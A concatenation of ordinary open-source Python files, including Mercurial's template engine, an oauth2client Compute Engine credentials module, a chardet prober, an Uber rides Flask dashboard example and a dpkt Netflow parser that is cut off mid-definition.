session = vm.wait_for_login(timeout=timeout)
module = params.get("modprobe_module")
if module:
error.context("Load module %s" % module, logging.info)
session.cmd("modprobe %s" % module)
for port in params.objects("virtio_ports"):
port_params = params.object_params(port)
port_name = get_virtio_port_name_by_params(port_params, port)
virtio_port = get_virtio_port_by_name(vm, port_name)
if not virtio_port:
raise exceptions.TestFail(
"Virtio Port named '%s' not found" %
port_name)
chardev_qid = virtio_port.get_param("chardev")
port_chardev = vm.devices.get_by_qid(chardev_qid)[0]
if module:
error.context("Unload module %s" % module, logging.info)
session.cmd("modprobe -r %s" % module)
error.context("Unplug virtio port '%s' in %d tune(s)" %
(port, repeat), logging.info)
virtio_port.unplug(vm.monitor)
if port_params.get("unplug_chardev") == "yes":
error.context(
"Unplug chardev '%s' for virtio port '%s'" %
(port, chardev_qid), logging.info)
port_chardev.unplug(vm.monitor)
time.sleep(0.5)
port_chardev.hotplug(vm.monitor)
virtio_port.hotplug(vm.monitor)
if module:
error.context("Load module %s" % module, logging.info)
session.cmd("modprobe %s" % module)
session.close()
vm.reboot()
session = vm.wait_for_login(timeout=timeout)
session.close()
| gpl-2.0 |
akosyakov/intellij-community | plugins/hg4idea/testData/bin/mercurial/templater.py | 90 | 16673 | # templater.py - template expansion for output
#
# Copyright 2005, 2006 Matt Mackall <[email protected]>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from i18n import _
import sys, os, re
import util, config, templatefilters, parser, error
import types
import minirst
# template parsing
elements = {
"(": (20, ("group", 1, ")"), ("func", 1, ")")),
",": (2, None, ("list", 2)),
"|": (5, None, ("|", 5)),
"%": (6, None, ("%", 6)),
")": (0, None, None),
"symbol": (0, ("symbol",), None),
"string": (0, ("string",), None),
"end": (0, None, None),
}
def tokenizer(data):
program, start, end = data
pos = start
while pos < end:
c = program[pos]
if c.isspace(): # skip inter-token whitespace
pass
elif c in "(,)%|": # handle simple operators
yield (c, None, pos)
elif (c in '"\'' or c == 'r' and
program[pos:pos + 2] in ("r'", 'r"')): # handle quoted strings
if c == 'r':
pos += 1
c = program[pos]
decode = False
else:
decode = True
pos += 1
s = pos
while pos < end: # find closing quote
d = program[pos]
if decode and d == '\\': # skip over escaped characters
pos += 2
continue
if d == c:
if not decode:
yield ('string', program[s:pos].replace('\\', r'\\'), s)
break
yield ('string', program[s:pos].decode('string-escape'), s)
break
pos += 1
else:
raise error.ParseError(_("unterminated string"), s)
elif c.isalnum() or c in '_':
s = pos
pos += 1
while pos < end: # find end of symbol
d = program[pos]
if not (d.isalnum() or d == "_"):
break
pos += 1
sym = program[s:pos]
yield ('symbol', sym, s)
pos -= 1
elif c == '}':
pos += 1
break
else:
raise error.ParseError(_("syntax error"), pos)
pos += 1
yield ('end', None, pos)
def compiletemplate(tmpl, context):
parsed = []
pos, stop = 0, len(tmpl)
p = parser.parser(tokenizer, elements)
while pos < stop:
n = tmpl.find('{', pos)
if n < 0:
parsed.append(("string", tmpl[pos:]))
break
if n > 0 and tmpl[n - 1] == '\\':
# escaped
parsed.append(("string", tmpl[pos:n - 1] + "{"))
pos = n + 1
continue
if n > pos:
parsed.append(("string", tmpl[pos:n]))
pd = [tmpl, n + 1, stop]
parseres, pos = p.parse(pd)
parsed.append(parseres)
return [compileexp(e, context) for e in parsed]
def compileexp(exp, context):
t = exp[0]
if t in methods:
return methods[t](exp, context)
raise error.ParseError(_("unknown method '%s'") % t)
# template evaluation
def getsymbol(exp):
if exp[0] == 'symbol':
return exp[1]
raise error.ParseError(_("expected a symbol"))
def getlist(x):
if not x:
return []
if x[0] == 'list':
return getlist(x[1]) + [x[2]]
return [x]
def getfilter(exp, context):
f = getsymbol(exp)
if f not in context._filters:
raise error.ParseError(_("unknown function '%s'") % f)
return context._filters[f]
def gettemplate(exp, context):
if exp[0] == 'string':
return compiletemplate(exp[1], context)
if exp[0] == 'symbol':
return context._load(exp[1])
raise error.ParseError(_("expected template specifier"))
def runstring(context, mapping, data):
return data
def runsymbol(context, mapping, key):
v = mapping.get(key)
if v is None:
v = context._defaults.get(key, '')
if util.safehasattr(v, '__call__'):
return v(**mapping)
if isinstance(v, types.GeneratorType):
v = list(v)
mapping[key] = v
return v
return v
def buildfilter(exp, context):
func, data = compileexp(exp[1], context)
filt = getfilter(exp[2], context)
return (runfilter, (func, data, filt))
def runfilter(context, mapping, data):
func, data, filt = data
try:
return filt(func(context, mapping, data))
except (ValueError, AttributeError, TypeError):
if isinstance(data, tuple):
dt = data[1]
else:
dt = data
raise util.Abort(_("template filter '%s' is not compatible with "
"keyword '%s'") % (filt.func_name, dt))
def buildmap(exp, context):
func, data = compileexp(exp[1], context)
ctmpl = gettemplate(exp[2], context)
return (runmap, (func, data, ctmpl))
def runtemplate(context, mapping, template):
for func, data in template:
yield func(context, mapping, data)
def runmap(context, mapping, data):
func, data, ctmpl = data
d = func(context, mapping, data)
if util.safehasattr(d, '__call__'):
d = d()
lm = mapping.copy()
for i in d:
if isinstance(i, dict):
lm.update(i)
lm['originalnode'] = mapping.get('node')
yield runtemplate(context, lm, ctmpl)
else:
# v is not an iterable of dicts, this happen when 'key'
# has been fully expanded already and format is useless.
# If so, return the expanded value.
yield i
def buildfunc(exp, context):
n = getsymbol(exp[1])
args = [compileexp(x, context) for x in getlist(exp[2])]
if n in funcs:
f = funcs[n]
return (f, args)
if n in templatefilters.funcs:
f = templatefilters.funcs[n]
return (f, args)
if n in context._filters:
if len(args) != 1:
raise error.ParseError(_("filter %s expects one argument") % n)
f = context._filters[n]
return (runfilter, (args[0][0], args[0][1], f))
def get(context, mapping, args):
if len(args) != 2:
# i18n: "get" is a keyword
raise error.ParseError(_("get() expects two arguments"))
dictarg = args[0][0](context, mapping, args[0][1])
if not util.safehasattr(dictarg, 'get'):
# i18n: "get" is a keyword
raise error.ParseError(_("get() expects a dict as first argument"))
key = args[1][0](context, mapping, args[1][1])
yield dictarg.get(key)
def join(context, mapping, args):
if not (1 <= len(args) <= 2):
# i18n: "join" is a keyword
raise error.ParseError(_("join expects one or two arguments"))
joinset = args[0][0](context, mapping, args[0][1])
if util.safehasattr(joinset, '__call__'):
jf = joinset.joinfmt
joinset = [jf(x) for x in joinset()]
joiner = " "
if len(args) > 1:
joiner = args[1][0](context, mapping, args[1][1])
first = True
for x in joinset:
if first:
first = False
else:
yield joiner
yield x
def sub(context, mapping, args):
if len(args) != 3:
# i18n: "sub" is a keyword
raise error.ParseError(_("sub expects three arguments"))
pat = stringify(args[0][0](context, mapping, args[0][1]))
rpl = stringify(args[1][0](context, mapping, args[1][1]))
src = stringify(args[2][0](context, mapping, args[2][1]))
src = stringify(runtemplate(context, mapping,
compiletemplate(src, context)))
yield re.sub(pat, rpl, src)
def if_(context, mapping, args):
if not (2 <= len(args) <= 3):
# i18n: "if" is a keyword
raise error.ParseError(_("if expects two or three arguments"))
test = stringify(args[0][0](context, mapping, args[0][1]))
if test:
t = stringify(args[1][0](context, mapping, args[1][1]))
yield runtemplate(context, mapping, compiletemplate(t, context))
elif len(args) == 3:
t = stringify(args[2][0](context, mapping, args[2][1]))
yield runtemplate(context, mapping, compiletemplate(t, context))
def ifeq(context, mapping, args):
if not (3 <= len(args) <= 4):
# i18n: "ifeq" is a keyword
raise error.ParseError(_("ifeq expects three or four arguments"))
test = stringify(args[0][0](context, mapping, args[0][1]))
match = stringify(args[1][0](context, mapping, args[1][1]))
if test == match:
t = stringify(args[2][0](context, mapping, args[2][1]))
yield runtemplate(context, mapping, compiletemplate(t, context))
elif len(args) == 4:
t = stringify(args[3][0](context, mapping, args[3][1]))
yield runtemplate(context, mapping, compiletemplate(t, context))
def label(context, mapping, args):
if len(args) != 2:
# i18n: "label" is a keyword
raise error.ParseError(_("label expects two arguments"))
# ignore args[0] (the label string) since this is supposed to be a a no-op
t = stringify(args[1][0](context, mapping, args[1][1]))
yield runtemplate(context, mapping, compiletemplate(t, context))
def rstdoc(context, mapping, args):
if len(args) != 2:
# i18n: "rstdoc" is a keyword
raise error.ParseError(_("rstdoc expects two arguments"))
text = stringify(args[0][0](context, mapping, args[0][1]))
style = stringify(args[1][0](context, mapping, args[1][1]))
return minirst.format(text, style=style, keep=['verbose'])
methods = {
"string": lambda e, c: (runstring, e[1]),
"symbol": lambda e, c: (runsymbol, e[1]),
"group": lambda e, c: compileexp(e[1], c),
# ".": buildmember,
"|": buildfilter,
"%": buildmap,
"func": buildfunc,
}
funcs = {
"get": get,
"if": if_,
"ifeq": ifeq,
"join": join,
"label": label,
"rstdoc": rstdoc,
"sub": sub,
}
# template engine
path = ['templates', '../templates']
stringify = templatefilters.stringify
def _flatten(thing):
'''yield a single stream from a possibly nested set of iterators'''
if isinstance(thing, str):
yield thing
elif not util.safehasattr(thing, '__iter__'):
if thing is not None:
yield str(thing)
else:
for i in thing:
if isinstance(i, str):
yield i
elif not util.safehasattr(i, '__iter__'):
if i is not None:
yield str(i)
elif i is not None:
for j in _flatten(i):
yield j
def parsestring(s, quoted=True):
'''parse a string using simple c-like syntax.
string must be in quotes if quoted is True.'''
if quoted:
if len(s) < 2 or s[0] != s[-1]:
raise SyntaxError(_('unmatched quotes'))
return s[1:-1].decode('string_escape')
return s.decode('string_escape')
class engine(object):
'''template expansion engine.
template expansion works like this. a map file contains key=value
pairs. if value is quoted, it is treated as string. otherwise, it
is treated as name of template file.
templater is asked to expand a key in map. it looks up key, and
looks for strings like this: {foo}. it expands {foo} by looking up
foo in map, and substituting it. expansion is recursive: it stops
when there is no more {foo} to replace.
expansion also allows formatting and filtering.
format uses key to expand each item in list. syntax is
{key%format}.
filter uses function to transform value. syntax is
{key|filter1|filter2|...}.'''
def __init__(self, loader, filters={}, defaults={}):
self._loader = loader
self._filters = filters
self._defaults = defaults
self._cache = {}
def _load(self, t):
'''load, parse, and cache a template'''
if t not in self._cache:
self._cache[t] = compiletemplate(self._loader(t), self)
return self._cache[t]
def process(self, t, mapping):
'''Perform expansion. t is name of map element to expand.
mapping contains added elements for use during expansion. Is a
generator.'''
return _flatten(runtemplate(self, mapping, self._load(t)))
engines = {'default': engine}
class templater(object):
def __init__(self, mapfile, filters={}, defaults={}, cache={},
minchunk=1024, maxchunk=65536):
'''set up template engine.
mapfile is name of file to read map definitions from.
filters is dict of functions. each transforms a value into another.
defaults is dict of default map definitions.'''
self.mapfile = mapfile or 'template'
self.cache = cache.copy()
self.map = {}
self.base = (mapfile and os.path.dirname(mapfile)) or ''
self.filters = templatefilters.filters.copy()
self.filters.update(filters)
self.defaults = defaults
self.minchunk, self.maxchunk = minchunk, maxchunk
self.ecache = {}
if not mapfile:
return
if not os.path.exists(mapfile):
raise util.Abort(_('style not found: %s') % mapfile)
conf = config.config()
conf.read(mapfile)
for key, val in conf[''].items():
if not val:
raise SyntaxError(_('%s: missing value') % conf.source('', key))
if val[0] in "'\"":
try:
self.cache[key] = parsestring(val)
except SyntaxError, inst:
raise SyntaxError('%s: %s' %
(conf.source('', key), inst.args[0]))
else:
val = 'default', val
if ':' in val[1]:
val = val[1].split(':', 1)
self.map[key] = val[0], os.path.join(self.base, val[1])
def __contains__(self, key):
return key in self.cache or key in self.map
def load(self, t):
'''Get the template for the given template name. Use a local cache.'''
if t not in self.cache:
try:
self.cache[t] = util.readfile(self.map[t][1])
except KeyError, inst:
raise util.Abort(_('"%s" not in template map') % inst.args[0])
except IOError, inst:
raise IOError(inst.args[0], _('template file %s: %s') %
(self.map[t][1], inst.args[1]))
return self.cache[t]
def __call__(self, t, **mapping):
ttype = t in self.map and self.map[t][0] or 'default'
if ttype not in self.ecache:
self.ecache[ttype] = engines[ttype](self.load,
self.filters, self.defaults)
proc = self.ecache[ttype]
stream = proc.process(t, mapping)
if self.minchunk:
stream = util.increasingchunks(stream, min=self.minchunk,
max=self.maxchunk)
return stream
def templatepath(name=None):
'''return location of template file or directory (if no name).
returns None if not found.'''
normpaths = []
# executable version (py2exe) doesn't support __file__
if util.mainfrozen():
module = sys.executable
else:
module = __file__
for f in path:
if f.startswith('/'):
p = f
else:
fl = f.split('/')
p = os.path.join(os.path.dirname(module), *fl)
if name:
p = os.path.join(p, name)
if name and os.path.exists(p):
return os.path.normpath(p)
elif os.path.isdir(p):
normpaths.append(os.path.normpath(p))
return normpaths
def stylemap(styles, paths=None):
"""Return path to mapfile for a given style.
Searches mapfile in the following locations:
1. templatepath/style/map
2. templatepath/map-style
3. templatepath/map
"""
if paths is None:
paths = templatepath()
elif isinstance(paths, str):
paths = [paths]
if isinstance(styles, str):
styles = [styles]
for style in styles:
if not style:
continue
locations = [os.path.join(style, 'map'), 'map-' + style]
locations.append('map')
for path in paths:
for location in locations:
mapfile = os.path.join(path, location)
if os.path.isfile(mapfile):
return style, mapfile
raise RuntimeError("No hgweb templates found in %r" % paths)
| apache-2.0 |
chwnam/lifemotif-desktop | python/oauth2client/gce.py | 224 | 3038 | # Copyright (C) 2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for Google Compute Engine
Utilities for making it easier to use OAuth 2.0 on Google Compute Engine.
"""
__author__ = '[email protected] (Joe Gregorio)'
import httplib2
import logging
import uritemplate
from oauth2client import util
from oauth2client.anyjson import simplejson
from oauth2client.client import AccessTokenRefreshError
from oauth2client.client import AssertionCredentials
logger = logging.getLogger(__name__)
# URI Template for the endpoint that returns access_tokens.
META = ('http://metadata.google.internal/0.1/meta-data/service-accounts/'
'default/acquire{?scope}')
class AppAssertionCredentials(AssertionCredentials):
"""Credentials object for Compute Engine Assertion Grants
This object will allow a Compute Engine instance to identify itself to
Google and other OAuth 2.0 servers that can verify assertions. It can be used
for the purpose of accessing data stored under an account assigned to the
Compute Engine instance itself.
This credential does not require a flow to instantiate because it represents
a two legged flow, and therefore has all of the required information to
generate and refresh its own access tokens.
"""
@util.positional(2)
def __init__(self, scope, **kwargs):
"""Constructor for AppAssertionCredentials
Args:
scope: string or iterable of strings, scope(s) of the credentials being
requested.
"""
self.scope = util.scopes_to_string(scope)
# Assertion type is no longer used, but still in the parent class signature.
super(AppAssertionCredentials, self).__init__(None)
@classmethod
def from_json(cls, json):
data = simplejson.loads(json)
return AppAssertionCredentials(data['scope'])
def _refresh(self, http_request):
"""Refreshes the access_token.
Skip all the storage hoops and just refresh using the API.
Args:
http_request: callable, a callable that matches the method signature of
httplib2.Http.request, used to make the refresh request.
Raises:
AccessTokenRefreshError: When the refresh fails.
"""
uri = uritemplate.expand(META, {'scope': self.scope})
response, content = http_request(uri)
if response.status == 200:
try:
d = simplejson.loads(content)
except StandardError, e:
raise AccessTokenRefreshError(str(e))
self.access_token = d['accessToken']
else:
raise AccessTokenRefreshError(content)
| lgpl-2.1 |
bud4/samba | source4/heimdal/lib/wind/util.py | 88 | 1978 | #!/usr/local/bin/python
# -*- coding: iso-8859-1 -*-
# $Id$
# Copyright (c) 2004 Kungliga Tekniska Högskolan
# (Royal Institute of Technology, Stockholm, Sweden).
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the Institute nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE INSTITUTE AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE INSTITUTE OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
def subList(l, sl) :
"""return the index of sl in l or None"""
lLen = len(l)
slLen = len(sl)
for i in range(lLen - slLen + 1):
j = 0
while j < slLen and l[i + j] == sl[j]:
j += 1
if j == slLen:
return i
return None
| gpl-3.0 |
barykaed/Pelican-Test | activate/Lib/site-packages/pip/_vendor/requests/packages/chardet/sbcharsetprober.py | 2927 | 4793 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
from .compat import wrap_ord
SAMPLE_SIZE = 64
SB_ENOUGH_REL_THRESHOLD = 1024
POSITIVE_SHORTCUT_THRESHOLD = 0.95
NEGATIVE_SHORTCUT_THRESHOLD = 0.05
SYMBOL_CAT_ORDER = 250
NUMBER_OF_SEQ_CAT = 4
POSITIVE_CAT = NUMBER_OF_SEQ_CAT - 1
#NEGATIVE_CAT = 0
class SingleByteCharSetProber(CharSetProber):
def __init__(self, model, reversed=False, nameProber=None):
CharSetProber.__init__(self)
self._mModel = model
# TRUE if we need to reverse every pair in the model lookup
self._mReversed = reversed
# Optional auxiliary prober for name decision
self._mNameProber = nameProber
self.reset()
def reset(self):
CharSetProber.reset(self)
# char order of last character
self._mLastOrder = 255
self._mSeqCounters = [0] * NUMBER_OF_SEQ_CAT
self._mTotalSeqs = 0
self._mTotalChar = 0
# characters that fall in our sampling range
self._mFreqChar = 0
def get_charset_name(self):
if self._mNameProber:
return self._mNameProber.get_charset_name()
else:
return self._mModel['charsetName']
def feed(self, aBuf):
if not self._mModel['keepEnglishLetter']:
aBuf = self.filter_without_english_letters(aBuf)
aLen = len(aBuf)
if not aLen:
return self.get_state()
for c in aBuf:
order = self._mModel['charToOrderMap'][wrap_ord(c)]
if order < SYMBOL_CAT_ORDER:
self._mTotalChar += 1
if order < SAMPLE_SIZE:
self._mFreqChar += 1
if self._mLastOrder < SAMPLE_SIZE:
self._mTotalSeqs += 1
if not self._mReversed:
i = (self._mLastOrder * SAMPLE_SIZE) + order
model = self._mModel['precedenceMatrix'][i]
else: # reverse the order of the letters in the lookup
i = (order * SAMPLE_SIZE) + self._mLastOrder
model = self._mModel['precedenceMatrix'][i]
self._mSeqCounters[model] += 1
self._mLastOrder = order
if self.get_state() == constants.eDetecting:
if self._mTotalSeqs > SB_ENOUGH_REL_THRESHOLD:
cf = self.get_confidence()
if cf > POSITIVE_SHORTCUT_THRESHOLD:
if constants._debug:
sys.stderr.write('%s confidence = %s, we have a'
'winner\n' %
(self._mModel['charsetName'], cf))
self._mState = constants.eFoundIt
elif cf < NEGATIVE_SHORTCUT_THRESHOLD:
if constants._debug:
sys.stderr.write('%s confidence = %s, below negative'
'shortcut threshhold %s\n' %
(self._mModel['charsetName'], cf,
NEGATIVE_SHORTCUT_THRESHOLD))
self._mState = constants.eNotMe
return self.get_state()
def get_confidence(self):
r = 0.01
if self._mTotalSeqs > 0:
r = ((1.0 * self._mSeqCounters[POSITIVE_CAT]) / self._mTotalSeqs
/ self._mModel['mTypicalPositiveRatio'])
r = r * self._mFreqChar / self._mTotalChar
if r >= 1.0:
r = 0.99
return r
| mit |
xzzz9097/android_external_skia | tools/copyright/fileparser.py | 232 | 2883 | '''
Copyright 2011 Google Inc.
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.
'''
import datetime
import re
def CreateParser(filepath):
"""Returns a Parser as appropriate for the file at this filepath.
"""
if (filepath.endswith('.cpp') or
filepath.endswith('.h') or
filepath.endswith('.c')):
return CParser()
else:
return None
class Parser(object):
"""Base class for all language-specific parsers.
"""
def __init__(self):
self._copyright_pattern = re.compile('copyright', re.IGNORECASE)
self._attribute_pattern = re.compile(
'copyright.*\D(\d{4})\W*(\w.*[\w.])', re.IGNORECASE)
def FindCopyrightBlock(self, comment_blocks):
"""Given a list of comment block strings, return the one that seems
like the most likely copyright block.
Returns None if comment_blocks was empty, or if we couldn't find
a comment block that contains copyright info."""
if not comment_blocks:
return None
for block in comment_blocks:
if self._copyright_pattern.search(block):
return block
def GetCopyrightBlockAttributes(self, comment_block):
"""Given a comment block, return a tuple of attributes: (year, holder).
If comment_block is None, or none of the attributes are found,
this will return (None, None)."""
if not comment_block:
return (None, None)
matches = self._attribute_pattern.findall(comment_block)
if not matches:
return (None, None)
first_match = matches[0]
return (first_match[0], first_match[1])
class CParser(Parser):
"""Parser that knows how to parse C/C++ files.
"""
DEFAULT_YEAR = datetime.date.today().year
DEFAULT_HOLDER = 'Google Inc.'
COPYRIGHT_BLOCK_FORMAT = '''
/*
* Copyright %s %s
*
* Use of this source code is governed by a BSD-style license that can be
* found in the LICENSE file.
*/
'''
def __init__(self):
super(CParser, self).__init__()
self._comment_pattern = re.compile('/\*.*?\*/', re.DOTALL)
def FindAllCommentBlocks(self, file_contents):
"""Returns a list of all comment blocks within these file contents.
"""
return self._comment_pattern.findall(file_contents)
def CreateCopyrightBlock(self, year, holder):
"""Returns a copyright block suitable for this language, with the
given attributes.
@param year year in which to hold copyright (defaults to DEFAULT_YEAR)
@param holder holder of copyright (defaults to DEFAULT_HOLDER)
"""
if not year:
year = self.DEFAULT_YEAR
if not holder:
holder = self.DEFAULT_HOLDER
return self.COPYRIGHT_BLOCK_FORMAT % (year, holder)
| bsd-3-clause |
droidsec-cn/hooker | hooker_common/hooker_common/elasticsearch/Models/EsEvent.py | 3 | 2305 | # -*- coding: utf-8 -*-
#+---------------------------------------------------------------------------+
#| |
#| Android's Hooker |
#| |
#+---------------------------------------------------------------------------+
#| Copyright (C) 2011 Georges Bossert and Dimitri Kirchner |
#| This program is free software: you can redistribute it and/or modify |
#| it under the terms of the GNU General Public License as published by |
#| the Free Software Foundation, either version 3 of the License, or |
#| (at your option) any later version. |
#| |
#| This program is distributed in the hope that it will be useful, |
#| but WITHOUT ANY WARRANTY; without even the implied warranty of |
#| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
#| GNU General Public License for more details. |
#| |
#| You should have received a copy of the GNU General Public License |
#| along with this program. If not, see <http://www.gnu.org/licenses/>. |
#+---------------------------------------------------------------------------+
#| @url : http://www.amossys.fr |
#| @contact : [email protected] |
#| @sponsors : Amossys, http://www.amossys.fr |
#+---------------------------------------------------------------------------+
#+---------------------------------------------------------------------------+
#| Standard library imports
#+---------------------------------------------------------------------------+
#+---------------------------------------------------------------------------+
#| Local imports
#+---------------------------------------------------------------------------+
from hooker.common import Logger
class EsEvent(object):
"""Object representation of an Event"""
| gpl-3.0 |
uber/rides-python-sdk | example/rider_dashboard.py | 1 | 2712 |
from flask import Flask, redirect, request, render_template
from example import utils # NOQA
from example.utils import import_app_credentials
from uber_rides.auth import AuthorizationCodeGrant
from uber_rides.client import UberRidesClient
from collections import OrderedDict, Counter
app = Flask(__name__, template_folder="./")
credentials = import_app_credentials('config.rider.yaml')
auth_flow = AuthorizationCodeGrant(
credentials.get('client_id'),
credentials.get('scopes'),
credentials.get('client_secret'),
credentials.get('redirect_url'),
)
@app.route('/')
def index():
"""Index controller to redirect user to sign in with uber."""
return redirect(auth_flow.get_authorization_url())
@app.route('/uber/connect')
def connect():
"""Connect controller to handle token exchange and query Uber API."""
# Exchange authorization code for acceess token and create session
session = auth_flow.get_session(request.url)
client = UberRidesClient(session)
# Fetch profile for rider
profile = client.get_rider_profile().json
# Fetch all trips from history endpoint
trips = []
i = 0
while True:
try:
response = client.get_rider_trips(
limit=50,
offset=i)
i += 50
if len(response.json['history']) > 0:
trips += response.json['history']
else:
break
except:
break
pass
# Compute trip stats for # of rides and distance
total_rides = 0
total_distance_traveled = 0
# Compute ranked list of # trips per city
cities = list()
for ride in trips:
cities.append(ride['start_city']['display_name'])
# only parse actually completed trips
if ride['distance'] > 0:
total_rides += 1
total_distance_traveled += int(ride['distance'])
total_cities = 0
locations_counter = Counter(cities)
locations = OrderedDict()
cities_by_frequency = sorted(cities, key=lambda x: -locations_counter[x])
for city in list(cities_by_frequency):
if city not in locations:
total_cities += 1
locations[city] = cities.count(city)
return render_template('rider_dashboard.html',
profile=profile,
trips=trips,
locations=locations,
total_rides=total_rides,
total_cities=total_cities,
total_distance_traveled=total_distance_traveled
)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8000, debug=True)
| mit |
ashumeow/pcaphar | src/third_party/dpkt/dpkt/netflow.py | 15 | 14827 | # $Id: netflow.py 23 2006-11-08 15:45:33Z dugsong $
"""Cisco Netflow."""
import itertools, struct
import dpkt
class NetflowBase(dpkt.Packet):
"""Base class for Cisco Netflow packets."""
__hdr__ = (
('version', 'H', 1),
('count', 'H', 0),
('sys_uptime', 'I', 0),
('unix_sec', 'I', 0),
('unix_nsec', 'I', 0)
)
def __len__(self):
return self.__hdr_len__ + (len(self.data[0]) * self.count)
def __str__(self):
# for now, don't try to enforce any size limits
self.count = len(self.data)
return self.pack_hdr() + ''.join(map(str, self.data))
def unpack(self, buf):
dpkt.Packet.unpack(self, buf)
buf = self.data
l = []
while buf:
flow = self.NetflowRecord(buf)
l.append(flow)
buf = buf[len(flow):]
self.data = l
class NetflowRecordBase(dpkt.Packet):
"""Base class for netflow v1-v7 netflow records."""
# performance optimizations
def __len__(self):
# don't bother with data
return self.__hdr_len__
def __str__(self):
# don't bother with data
return self.pack_hdr()
def unpack(self, buf):
# don't bother with data
for k, v in itertools.izip(self.__hdr_fields__,
struct.unpack(self.__hdr_fmt__, buf[:self.__hdr_len__])):
setattr(self, k, v)
self.data = ""
class Netflow1(NetflowBase):
"""Netflow Version 1."""
class NetflowRecord(NetflowBase.NetflowRecordBase):
"""Netflow v1 flow record."""
__hdr__ = (
('src_addr', 'I', 0),
('dst_addr', 'I', 0),
('next_hop', 'I', 0),
('input_iface', 'H', 0),
('output_iface', 'H', 0),
('pkts_sent', 'I', 0),
('bytes_sent', 'I', 0),
('start_time', 'I', 0),
('end_time', 'I', 0),
('src_port', 'H', 0),
('dst_port', 'H', 0),
('pad1', 'H', 0),
('ip_proto', 'B', 0),
('tos', 'B', 0),
('tcp_flags', 'B', 0),
('pad2', 'B', 0),
('pad3', 'H', 0),
('reserved', 'I', 0)
)
# FYI, versions 2-4 don't appear to have ever seen the light of day.
class Netflow5(NetflowBase):
"""Netflow Version 5."""
__hdr__ = NetflowBase.__hdr__ + (
('flow_sequence', 'I', 0),
('engine_type', 'B', 0),
('engine_id', 'B', 0),
('reserved', 'H', 0),
)
class NetflowRecord(NetflowBase.NetflowRecordBase):
"""Netflow v5 flow record."""
__hdr__ = (
('src_addr', 'I', 0),
('dst_addr', 'I', 0),
('next_hop', 'I', 0),
('input_iface', 'H', 0),
('output_iface', 'H', 0),
('pkts_sent', 'I', 0),
('bytes_sent', 'I', 0),
('start_time', 'I', 0),
('end_time', 'I', 0),
('src_port', 'H', 0),
('dst_port', 'H', 0),
('pad1', 'B', 0),
('tcp_flags', 'B', 0),
('ip_proto', 'B', 0),
('tos', 'B', 0),
('src_as', 'H', 0),
('dst_as', 'H', 0),
('src_mask', 'B', 0),
('dst_mask', 'B', 0),
('pad2', 'H', 0),
)
class Netflow6(NetflowBase):
"""Netflow Version 6.
XXX - unsupported by Cisco, but may be found in the field.
"""
__hdr__ = Netflow5.__hdr__
class NetflowRecord(NetflowBase.NetflowRecordBase):
"""Netflow v6 flow record."""
__hdr__ = (
('src_addr', 'I', 0),
('dst_addr', 'I', 0),
('next_hop', 'I', 0),
('input_iface', 'H', 0),
('output_iface', 'H', 0),
('pkts_sent', 'I', 0),
('bytes_sent', 'I', 0),
('start_time', 'I', 0),
('end_time', 'I', 0),
('src_port', 'H', 0),
('dst_port', 'H', 0),
('pad1', 'B', 0),
('tcp_flags', 'B', 0),
('ip_proto', 'B', 0),
('tos', 'B', 0),
('src_as', 'H', 0),
('dst_as', 'H', 0),
('src_mask', 'B', 0),
('dst_mask', 'B', 0),
('in_encaps', 'B', 0),
('out_encaps', 'B', 0),
('peer_nexthop', 'I', 0),
)
class Netflow7(NetflowBase):
"""Netflow Version 7."""
__hdr__ = NetflowBase.__hdr__ + (
('flow_sequence', 'I', 0),
('reserved', 'I', 0),
)
class NetflowRecord(NetflowBase.NetflowRecordBase):
"""Netflow v7 flow record."""
__hdr__ = (
('src_addr', 'I', 0),
('dst_addr', 'I', 0),
